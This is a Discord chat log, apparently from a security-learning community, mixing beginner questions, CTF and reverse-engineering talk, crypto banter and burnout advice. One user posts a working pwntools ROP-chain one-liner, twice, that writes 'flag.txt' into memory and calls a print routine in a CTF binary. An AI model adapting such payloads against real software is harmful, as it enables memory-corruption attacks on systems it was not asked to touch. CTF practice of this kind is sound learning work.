1$ Targeted attack: an attacker A is specifically targeting machine B

2$A fully developed ubuntu virus that uses 0day exploits and priv esc capabilities

3$ A fully developed windows virus that has 0day exploits ,priv esc capabilities, and AV evasion

4$A linux freeipa server controlling linux computers

5$A windows AD system

6$A threat actor specifically designing a ransomeware with the target being affecting the highest number of users

7$IOT system using windows core
8$IOT system using ubuntuiot
9$IOT system using stripped custom linux distro like yocto proj

Ty in advance
💙

burnt night
#

Is this a homework assignment?

#

It looks like a homework assignment

dusty sleet
#

I assure you it is not james,Ive written this question after seeing so much debate on the topic from so many resources

clear surge
#

Is there anyway to possibly generalize that? Both windows and Linux have a million ways to escalate privileges if things aren’t setup correctly. Only thing you might be able to generalize is that AD widens the potential impact since it’s how a log of organizations manage every IT resource

#

And 0 days will break any system because by definition no one knows about it and can develop preventative/mitigating measures

frail rapids
#
print((p:=__import__('pwn'),b'A'*44+b''.join([p.p32(0x080485aa)+p.p32(0x0804a020+n)+p.p32(ord(c))+p.p32(0x08048543)for n,c in enumerate('flag.txt\x00')])+b'\xd0\x83\x04\x08BBBB\x20\xa0\x04\x08')[1])
``` who said payload printing shouldn't be a oneliner
#
python3 -c "print((p:=__import__('pwn'),b'A'*44+b''.join([p.p32(0x080485aa)+p.p32(0x0804a020+n)+p.p32(ord(c))+p.p32(0x08048543)for n,c in enumerate('flag.txt\x00')])+b'\xd0\x83\x04\x08BBBB\x20\xa0\x04\x08')[1])"
``` go brrr
twin ridge
#

that hurts my eyes

half fractal
#

ugh no

torpid onyx
#

.

dusty sleet
torpid veldt
smoky mortar
#

Is this the morse-code programming channel? 🤔

neon roost
#

perhaps

twin ridge
candid parcel
warped zinc
#

$whoami

frail rapids
#

honestly

#

rop chains are so cool.. I think I might've found my new area of interest

dusty sleet
#

Computer having existential crisis

weary creek
torpid veldt
#

$whereami

hidden fjord
#

hey

torpid veldt
lusty locust
mortal venture
hoary nymphBOT
#

Gave +1 Rep to @lusty locust

lusty locust
#

Then that friend needs to learn...

  • 3DS Max or Maya
  • Substance Designer
  • Substance Painter
  • How to setup scenes in Unreal Engine 4

Expect 2-5 years of XP to get started

mortal venture
#

Oh noted noted thanks thanks I’ll research and help her thanks again man 🙂

lusty locust
#

That`s for environment art

#

For Characters...
Most of the work is done in Zbrush now

#

3d sculpting

#

3d art is HARD

#

and extremely competitive and time consuming

#

and demanding, jobwise

#

(burn out)

#

--
Blender is free, but it is not usually used in game studios.
The standards are 3ds max and maya

#

Rarely... MODO

mortal venture
#

Thanks thanks thanks

ripe haven
quasi turtle
past flame
#

Hello I have some doubts related to hacking can anyone please solve

vapid wedge
#

hi people...im new here🙋‍♂️

south inlet
#

Hi New here, I'm Scrubz!

gray jetty
charred gorge
#

Did I miss some fun? SureBruh

scarlet moth
#

and Muiri works to reinforce that

frail rapids
#

😂

livid panther
#

Hello.

winged rain
frail rapids
#

is there a way to make ghidra interpret optcodes beyond a ret?

merry bramble
#

Since it's dead/unreachable code in Ghidra's eyes, it may not be the best tool for that. You're probably better off with Radare2 for the ROP Emporium stuff honestly.

#

(still think you should install pwndbg too) 😛

faint island
frail rapids
#

Thanks, both of you

keen harness
#

hlo guys

torpid veldt
torpid veldt
torpid veldt
#

food

scarlet moth
torpid veldt
#

oh, werps. I didn't know that was a channel. Or is that a thread, looks like thread icon

#

Oh okay it's a thread, I didn't see it cuz I wasn't joined

scarlet moth
#

yeah thread, thought you might like 🙂

pure berry
#

How to mitigate Weak ssl /tls key exchange ??? Windows server

burnt night
frail rapids
#

Does anyone know how to pipe multiple lines of input into a program?

#

^without the use of pwntools

#

but it basically comes down to pwntools' p.recvline();p.sendline();p.recvline();p.sendline();...

#

just want a simpler command line util

odd acorn
#

Care to give an example of what you're trying to do?

merry bramble
frail rapids
#

I'm trying to exploit a buffer overflow vuln in a program that has number menus:

1) something
2) something else
3) exit
``` but I need to give 3 inputs
frail rapids
#

like bash piping but that's a mess with multiple inputs at once

merry bramble
#

Well your example is sending and receiving so it's reactive, what you have there is probably as close to a one liner as you're going to get. But if you don't need to send in between, you can just put newlines or whatever other break you need in the string itself.

#

oneliners are overrated in my opinion. I grew up in the perl community, I've seen enough of that breed of abuse 😉 They're useful when necessary, but I think you're better off making your code readable and re-usable if you have the option. Pwntools is great for that.

#

Just my two cents 🙂 But someone else may have a good answer for you. So I'll be off.

frail rapids
#

Hm alright

odd acorn
#

Could possibly do it with shell Python but that would be hellish

#

Bash isn't my strong suit

cat file.ext | while read line; do whatever $line; done

I'm struggling to grasp what you're looking for in my mind so I can't really write something for it

frail rapids
#

but preferably in a bash oneliner

odd acorn
#

Wait, what challenge is this from?

#

So.. we shouldn't be helping with these..?

frail rapids
#

fair point, but I already knew the answer

#

just wanted an alternative for these long exploit files

#

I keep finding myself in these painful scenarios during binexp and cba to make an entire exploit file

merry bramble
#

code re-use is your friend

#

build a template and adapt it to each scenario

#

doing it in bash will be much more work in my opinion

signal hull
#

Don’t really know how you’d do it otherwise because of how the i/o stream seems to get handled

merry bramble
frail rapids
#

How do hash identifiers work?

#

I don't assume their only variables are hash length and special format chars, right?

burnt night
#

There's a principle called the random oracle, and it basically says you can't tell apart a hash from random data

#

Same thing with encrypted data

frail rapids
#

Ahhh so that's what an oracle is in crypto

burnt night
burnt night
#

Not sure, there's been a few

charred gorge
dusty sleet
#

Based, guess i need a new setup as my old one is now featured as a very old machinery

idle hollow
#

Greetings, im new.

winged rain
#

Greetings new, I'm potatoe

cedar shard
#

no clearly you're a burner smh

torpid veldt
torpid veldt
idle hollow
#

am i able to implement tryhackme into my resume?

torpid veldt
idle hollow
#

thank you

frail rapids
#

Can someone explain to me what the logic is behind not being able to redirect (using the Location header) to javascript:alert()?

sacred sandal
#

Hello mods, can you please give me sec+ role when you have some time 🤓

odd acorn
#

+role @sacred sandal sec+

#

-role @sacred sandal sec+

#

reeeee

spark sun
#

-arole 475611892627406859 sec+

hoary nymphBOT
#
GiveRole <User:Mention/ID> <Role:Role>

[-d d:Duration - Duration]

Invalid arguments provided: Invalid role mention or id
odd acorn
#

-arole 475611892627406859 sec+

hoary nymphBOT
#
GiveRole <User:Mention/ID> <Role:Role>

[-d d:Duration - Duration]

Invalid arguments provided: Invalid role mention or id
odd acorn
#

-arole 475611892627406859 Sec+

hoary nymphBOT
#

That user already has that role

spark sun
#

stupid bot

odd acorn
#

I hate everything 😆

sacred sandal
hoary nymphBOT
#

Gave +1 Rep to @odd acorn

frail rapids
#

Am I the only one who dislikes winedbg?

#

I really wish there were alternatives because I feel like a turtle laying on its back when I have to use winedbg

#

I'm comfortable af using gdb so it sucks that it doesnt have wine compatability or something

torpid veldt
frail rapids
#

Hmm aight

#

Oh

#

I was talking about wine``dbg

#

not windbg

#

winedbg is the debugger for wine: a linux PE execution framework thing

ripe haven
#

Or maybe even get a remote debugging instance for some debuggers

frail rapids
frail rapids
signal hull
quaint basin
#

Same goes for compilation. 99% of the time it's gonna be easier to compile on the target platform

spark sun
#

Cross-compiling is almost always an adventure into the 10th circle , Dependency Hell

twin ridge
#

been there, done that, bought the t-shirt, am still trying to escape

idle olive
#

Hi, I need help

rapid barn
#

tbh wrong channel

idle olive
#

I'm having an error in linux post, I can't ssh to shiba1 it says the password is wrong

rapid barn
idle olive
#

tks

idle hollow
#

i need help answering a question on one of the paths, what is the street of the kidnapper for digital forensics? ive been at this question for so long.

#

nevermind found it

burnt night
idle hollow
#

ok thanks.

soft mason
#

hi, i just wanna know if one day we gonna have a black theme on THM website ?

#

(maybe i am wrong and its already possible)

burnt night
soft mason
lusty locust
#

I just close the lights in my room.

#

'' Dark mode ''

frail rapids
#

Are there mitigations for dir busting?

#

Best way I can come up with is IP banning users based on how many 404s they've activated but that's a bit witty

#

You could detect based on the amount of requests in a time period, but that can be bypassed by slowing down

twin ridge
#

you can maybe track 404s to an given ip

burnt night
frail rapids
#

Hm fair point, but wouldn't that disturb the attackers' recon?

#

Which in turn makes it harder to find bugs/vulns*

spark sun
burnt night
echo dust
waxen raven
#

Is it because it's near impossible to brute force all those numbers and the filename in the URL?

pine iron
#

I don’t figure it’s secure at all

frail rapids
hoary nymphBOT
#

Gave +1 Rep to @frail rapids

frail rapids
#

actually, that's server_id/message_id/filename

#

so you'd need to bruteforce filename as well

pine iron
#

Security through obscurity sucks

burnt night
# pine iron Security through obscurity sucks

Security through "the fact you'd never be able to fuzz that much" is not obscurity, it's why we use long key lengths. It's entropy. It's why UUIDs are fine in URLs for similar things.

echo dust
# waxen raven Thank you, I will need it.

The real questions are: Is it sequential or random? If random: Can the seed/step be calculated? Or can viable real results be pre-verified (think how the numeric code of a credit-card is mathematically verifiable.)

Basically is it either possible to predict the possibilities, or to calculate in some way to reduce the number of bad requests.

burnt night
#

They're snowflake IDs, I think that's what Discord calls them

odd acorn
#

Yes, they're snowflakes

#

And ngl I don't think Discord actually care too much about you accessing other images

normal lynx
#

How does one get access to the fabled "Advanced General" chat? There's mention in the rules about either being top rank or having completed a network. Wreath counts towards that, right?

odd acorn
#

No, Wreath doesn't count because it's a beginner network

normal lynx
#

Oh, that's not specified in the rules.

#

chuckles I'm just nosy.

odd acorn
normal lynx
#

I guess I'll have to add that to the infinite list of challenges to tackle sooner than later.

frail rapids
#

If there was one infosec/VR skill you wanted to master, what would it be?

#

I'm kind of split in between binexp and webexp, but in practice I feel stuck in both. I don't know how I can break into real world projects as most of my experience is based on ctfs

signal hull
#

I'm definitely split between binex and cryptography because those are the things I'm studying right now, but if you're using/learning from CTFs the right way, real world projects shouldn't be too intimidating.

#

If you're just running through challenges by copying and pasting commands you don't understand, yeah, the real world isn't like that. But, if you're doing a box, solving it, then going back through some of the source code to really make sure you understand what happened, you shouldn't have that kind of doubt 🤷‍♂️

drifting socket
#

Just imagine the people that for whatever reason send personal images of their ID for say and it somehow gets dug up

#

That would not be good lol

burnt night
#

Daily reminder not to post stuff on the internet even if you think it's private

drifting socket
#

True

waxen raven
#

Somewhere out there you can find a screenshot of my cards. And I mean all of my different types of cards. State ID, debit, credit, you name it, I got it.

drifting socket
#

😂

ripe haven
signal hull
#

disagree with the relaxing bit imo kekw

#

Crypto demands my full focus and RE is pain until you find the chain of things you needed to find, and then it feels like a weight has been lifted off of your shoulder

#

but I do like doing both anyway

ripe haven
#

And Cryptography does require focus but once you get the hang of it it’s really chill

#

They both feel more like Exploit Dev than other stuff in Cyber

#

But easier, like wayyy easier.

frail rapids
#

I'm messing with encrypted HTTPS traffic and I see the following

172.16.0.10 -> GET ... HTTPS/1.1 [length 119] -> 172.16.0.20
172.16.0.10 <- RESPONSE HTTPS/1.1 [length 118] <- 172.16.0.20
172.16.0.10 <- RESPONSE HTTPS/1.1 [length 40] <- 172.16.0.20

Packet 3 has a FIN flag. In what scenario and why would the webserver send a 2nd application data response (packet 3)?

ripe haven
frail rapids
#

I don't think it's the latter. I have about ~13 of those webserver response sequences and they all have the same length and format

#

including that 2nd response with FIN

#

could it be that the webserver is down while the server (machine) is not?

ripe haven
# frail rapids fyi

It looks like it sends two packets every few seconds, and all are the same size, let me look it up rq

#

Maybe, it’s a webserver sending a video piece by piece, with a low bandwidth?

frail rapids
#

I probably should've sent both sides, but those are just the server responses

#

Here's an example of request and response

#

.10 is the client and .20 is the server

ripe haven
#

Are you sure it’s HTTPS?

#

Everything is fixed size

frail rapids
ripe haven
frail rapids
ripe haven
#

Like the header and footer of the packets is somehow in the middle of the packets?

frail rapids
#

I don't think so. the metadata about the packets seem right

#

Something I find odd is that the checksum verification is disabled

#

Seems like they're all invalid when I enable it

calm hedge
#

@frail rapids do you have the pcap file? And your question is why is FIN sent?

frail rapids
#

and yeah, I have the pcap

calm hedge
#

Can i have a look if it is alright with you? If it is not something confidential of course and you can share

minor juniper
#

Hello?

radiant jacinth
#

halo

twin ridge
#

hi

past heart
#

hi

maiden violet
#

Hello

calm hedge
#

hi

dusty sleet
#

Hemnlo

tranquil bolt
#

I'm finally thirty-eighth in Italy!

#

Let'ss goooooo

paper spoke
#

Helloo

tardy orchid
#

Does anyone want to start a conversation on how drones can be used for security in cyber security realm?

#

I am looking into how it can be used as an offensive security tool or aid, but it’s gotten nowhere

winged rain
#

You mean as a weapon?

calm hedge
dusty sleet
limber igloo
#

how far can you go with free thm plan?

soft pier
#

though the paths are not part of it... but you can do 2 networks and the advent of cyber rooms to learn a decent bit to start then move onto a lot of different topics

limber igloo
#

👍

south inlet
#

80% ( I think ) of the content is free.

limber igloo
#

yeah, i read that somewhere too, though it didn't seem like it

gray jetty
#

thing is most of the hard and almost all insane rooms are free cuz most of them are community made, most of the easy info ones are site made and subbed :/

limber igloo
#

I see, thanks all

burnt night
limber igloo
#

what's this "path" that everyone is refering to?

gray jetty
burnt night
arctic tendon
#

I'm doing paths from the very beggining

#

they are worth it @limber igloo, they teach all from the basics 🙂

limber igloo
#

Mhm

icy pawn
#

hi

serene trench
#

What does the bot say when you try to verify?

#

#general is busy atm so things are getting burried

icy pawn
serene trench
#

Do you have multiple THM accounts? you can only link one thm account to your discord profile

icy pawn
#

is there a way for you guys to manually remove it ?

serene trench
#

Yeah, I just need to verify that you own it. If I get the profile for what's already linked, would you be able to login to it on THM?

icy pawn
serene trench
#

The one that is linked to your discord account already

icy pawn
#

which is another account im not using correct ?

serene trench
#

yeah

icy pawn
#

yea i dont quite remember which account that is though

serene trench
#

If I get the URL to the profile would you recognise it to login?

icy pawn
#

Wait, if i get the 2nd account up and running can you move forward with things from there ?

serene trench
#

yup - that would be handy(:

icy pawn
#

Cause i have a bunch of email and i need to reset the password for the 2nd account then

#

aight thank you very much ben, ill come back soon with the news

#

would it be fine if i ping you?

serene trench
#

sure!

toxic tusk
#

@grand hamlet mind if i drop a dm?

hollow plank
#

Please criticise my article

odd acorn
#

@hollow plank Can you post a non-medium link, please? 🙂

dusty sleet
#

Are u him with the weird stickman pf0

hollow plank
odd acorn
# hollow plank Sure but why

Medium is a monetary platform, asking for criticism, while plausible, may be just for clicks.
I am presuming, yes:)

#

But this is where my presumptions come from. Total of 5 messages and you're just self promoting in them.

ripe haven
#

@primal steppe ^^^^

frail rapids
#

What's the point of removing MBR in wiper malware?

#

can't the bootloader be reinstalled and partition table be recovered (magic bytes of partition)?

calm hedge
primal steppe
#

Nice scam

primal steppe
ripe haven
tawdry dove
#

Not agreeing with this in any way

primal steppe
#

Yes (that's a scam too. someone using someone else to break into a car isn't an excuse to break into every car)

scarlet moth
#

this must hurt (ETH)

#

I just saw someone recently who said they had all their non-retirement savings in ETH

#

stocks are fairly cyclical, crypto doesn't have enough time to determine if it will be

soft pier
#

GG

ripe haven
twin ridge
ripe haven
bold coral
#

so buy the dip?

bold coral
burnt night
#

"Buying the dip" involves faith that it'll come back.

ripe haven
#

BTC isn’t doing much better xD

serene trench
#

I am glad I sold all my crypto two weeks ago

#

Lost a bit but at least I’m not losing more

winged rain
#

Did some Kali wallpapers get removed?

south inlet
#

From Kali?

ripe haven
#

+rep @worn schooner

hoary nymphBOT
#

Gave +1 Rep to @worn schooner

waxen raven
#

Starting my job search in IT for the first time. I'm going to miss sleeping in.

serene trench
formal karma
frail rapids
#

Finished my little PHP CRUD app today :p

#

I put 15 hours into the CSS

#

I'm starting in a sec engineer position next week and I had like 2 weeks to learn PHP 🙏 (FYI they do know I've barely used any PHP, ever)

frail rapids
calm hedge
ripe haven
warm peak
#

doesn't look like to be frozen

#

try to bring the folder forward

#

and send a ss

#

you can't press on the file explorer?

#

hmm

#

looks like some services not wanting to start

hard mason
scarlet moth
#

all crypto are shitcoins

hard mason
#

Fair

hard mason
echo dust
calm hedge
#

@frail rapids and always === if you want something to be exact equal to something

narrow trout
# scarlet moth all crypto are shitcoins

fells kind of refreshing to hear somebody else besides me say this because i'm kind of sick of mostly everybody acting like they have some kind of hidden real life use/purpose besides trading money from a shitcoin to another, through decentralized exchanges or other shady ways of trading these "assets" through a network that is rather wonky, hard to monitor and control etc

calm hedge
hoary nymphBOT
#

Gave +1 Rep to @warm peak

narrow trout
calm hedge
narrow trout
# calm hedge That is true! What do you think about nft?

ufff don't even know what to say, i mean i don't have a strong and informed opinion on it because i am not that well informed about the subject, compared with crypto but from what i have read and saw along the way it's just another type of scam, it compares itself with real life art and wants to sound more valuable and important but in reality it's just digital pictures sold on a lot of money without a strong and valid justification, at least in my opinion...

calm hedge
burnt night
#

It's like a receipt for the art. The art isn't protected at all.

calm hedge
hoary nymphBOT
#

Gave +1 Rep to @burnt night

burnt night
#

Trivially.

#

It's typically just a link to the image hosted on ipfs, sometimes with an http to ipfs service to you can easily browse to it.

calm hedge
unique bolt
#

If you're interested, folding ideas made a great video on the topic

hard mason
hard mason
twin ridge
#

either way when the server dies, you've got nothing

#

or the server owner can remove and/or modify the image and you have no recourse. Only the receipt is immutable, everything else isn't

vocal ridge
unique bolt
#

History loves repeating itself

vocal ridge
#

Kind of a downer but anyone else deal with imposter syndrome?

#

Outting myself here..

spark sun
#

There are multiple ways to deal with the imposter syndrome; one of the ways I see very commonly is to panic and overcompensate to be the 'expert'. This usually doesn't go well in the long term. Another way (and the one I use) is to use that anxiety to drive myself to learn more, both in my primary knowledge domains and to explore the domains that are releated but that I don't touch every day

hard mason
scarlet moth
#

yeah my strategy is to never quit studying...

full tapir
# vocal ridge Kind of a downer but anyone else deal with imposter syndrome?

My experience comes from an other industry but if available to you find a mentor or someone with more experience. Explain to them how you feeling and try to work together on identifying your weaknesses. Write them down and elaborate an efficient plan to work on them. Never stop studying is always a good philosophy but a good method avoid burn downs.

#

What I have learned is that is hard to gage your state just by personal perspective but with an external input is easier to have a more accurate assessment

vocal ridge
#

and I give myself very little room for error before I begin the internal self-deprecation.

It's my own personal hell

full tapir
# vocal ridge I know where I'm weak. I also tend to either A: work at it 12 hours a day, 7 day...

This episode explains the science of motivation and drive. I describe how dopamine, a chemical we all make in our brain, underlies our desire for and pursuit of our goals, as well as our capacity to move and experience pleasure. I describe how we can leverage specific behaviors, reward schedules and dopamine-prolactin balance to help ensure we c...

▶ Play video
#

He is a neuroscientist, his very science based approach has helped me a lot.

full tapir
# full tapir https://youtu.be/vA50EK70whE

Also this one may help.
https://youtu.be/Wcs2PFz5q6g

In this episode, I review the science of habit formation and habit elimination and how the process of neuroplasticity (brain rewiring) underlies these processes.

I describe two new systems for habit formation. The first system is grounded in the neuroscience of brain states and our ability to perform (and to avoid) certain tasks at different p...

▶ Play video
vocal ridge
#

I'm motivated, I thought. It's all I think about. Idk

#

I've been going 12-14 hours/day, every day for 4 months.

I feel mentally exhausted. I haven't touched a box in about a month now.

I feel the guilt and anxiety but I'm just so damn tired, between this and work, other commitments, family, social life...

#

And I'll can think is "you're a lazy piece of s#it... You're not cut out for this"

#

I mean, it was fun though

full tapir
#

Taking brakes is ok and you need to accept it. Motivation / dopamine is a finite but renewable source. Enjoy your brake as it will restore your drive.

midnight minnow
#

I was burnt out before for a freaking long tim
I am feeling a bit motivated from the last 2 days and my academic exams finished so there's that 🥳

#

Sometimes just take your bicycle/bike and get out of the house and ride blobheart
Helped me a lot

vocal ridge
#

Yeah... Been getting out more. I look to the sky but my eyes burn.

I've been neglecting other important things for this.

half mesa
limpid whale
#

I mean, if you managing your time correctly you can put B option like: " now it's my free time for playing games, watching netflix or whatever makes you feel fresh". Also don't force yourself, like now i'ill work for 12 hours straight, in my opinion that can only produce more stress and force you to make an errors.

vocal ridge
vocal ridge
#

Ad nauseam

limpid whale
vocal ridge
#

Well, it seems like "that" or letting that aggressive, negative voice take over.

I'd rather be "aggressively positive"

Idk man. I have "personal issues", if you catch my drift.

vocal ridge
#

That's really inspiring to me. It resonates.. incredible.

soft pier
# burnt night

that feels like an amazing hack to get around the feeling of being an imposter

calm hedge
#

What do you suggest doing at that point? I am the same

#

That is good! And possibly a break, thank you though

vocal ridge
#

i get obsessive. i enjoy myself when I'm doing it and i shut the world out. idk if it's unhealthy or not

#

i get highly agitated when interupted. i dunno...

#

maybe i should take a look at that too....

dusty sleet
#

Do some resistance training and get creatine

#

A gymbro advice that has helped me immensely

vocal ridge
#

i do work out occasionally. no creatine tho smile

dusty sleet
calm hedge
vocal ridge
#

i like combo multipliers

dusty sleet
#

opinion rejected tho

calm hedge
dusty sleet
#

get gud + L

winged rain
#

You do not need supplements to workout

#

U Just need to lift big rok

#

Eat gud

#

Get big

calm hedge
full tapir
dusty sleet
full tapir
dusty sleet
echo warren
severe pasture
#

what are the general rules when it comes to making write ups for the new Active Directory networks?

#

I am preparing my first one but I don't want to publish it yet if there is a hold on releasing them

radiant jacinth
#

cześć dopiero poznaję to miejsce jak mam znależć użytwownika dumbasPL?

ripe haven
#

Get szy

odd acorn
#

No clue what a dumbasPL user is

ripe haven
radiant jacinth
#

im polish man

#

pleace help me

burnt night
#

Original EP?

#

"ELF virus" is not something that goes out these channels

frail rapids
#

Ah, mb

frail rapids
burnt night
frail rapids
#

It would make sense, since EP is infected and then jumps to OEP with normal binary code

vocal ridge
#

there's an advanced general?

south inlet
#

One of them is 0xD

vocal ridge
#

sounds exclusive and fancy ~

#

can't wait to have it 😎 even though i don't know the requirements lol